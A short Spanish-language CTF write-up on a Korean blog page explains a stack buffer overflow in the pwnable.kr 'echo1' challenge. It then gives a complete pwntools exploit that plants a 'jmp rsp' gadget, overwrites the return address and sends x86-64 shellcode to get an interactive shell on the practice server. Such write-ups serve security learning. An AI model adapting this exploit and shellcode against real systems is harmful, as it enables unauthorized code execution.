History view
Writeup - pwnable.kr
Sabiendo que tenemos un overflow y la dirección de retorno en el stack, podríamos escribe en el bufferjmp rsp. Segundo aprovecharemos el overflow para escribir en la dirección de retorno justo la dirección del bufferjmp rspy seguidamente el shellcode. PWNED.
Exploit
from pwn import * import time context.log_level = 'debug' p = remote ( "pwnable.kr" , 9010 ) #p = process ('./echo1') # gdb.attach (p, '' ' #break * 0x0000000000400818 #continue #' '') shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05 " p. recvuntil ( "hey, what's your name?" ) p.sendline (asm ( "jmp rsp" , arch = 'amd64' , os = 'linux' )) p.recvuntil ( ">" ) p.sendline ( "1" ) sleep ( 1 ) p.sendline ( "AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG\xa0\x20\x60\x00\x00\x00\x00\x00"+shellcode) p.interactive ()
'Pwning in Linux' 카테고리의 다른 글
| Armoury - Pragyan CTF 19 (2) | 2019.03.10 |
|---|---|
| Secret Keeper - Pragyan CTF 19 (0) | 2019.03.09 |
| Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- 32Bit
- canary
- XSS
- Windows
- html injection
- write primitive
- fake stack frame
- GOT Dereferencing/Overwriting
- dnspy
- cracking
- Call oriented programming
- one gadget
- pwnable.xyz
- return oriented programming
- hijacking redirection flow
- use after free
- format string
- arithmetic overflow/underflow
- open-redirect
- theFaunia course
- leak stack memory address
- ASM
- pwnable.tw
- leak libc
- shellcode
- Pwnable.kr
- stack pivot
- buffer overflow
- x64dbg
- Backdoors
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
Archives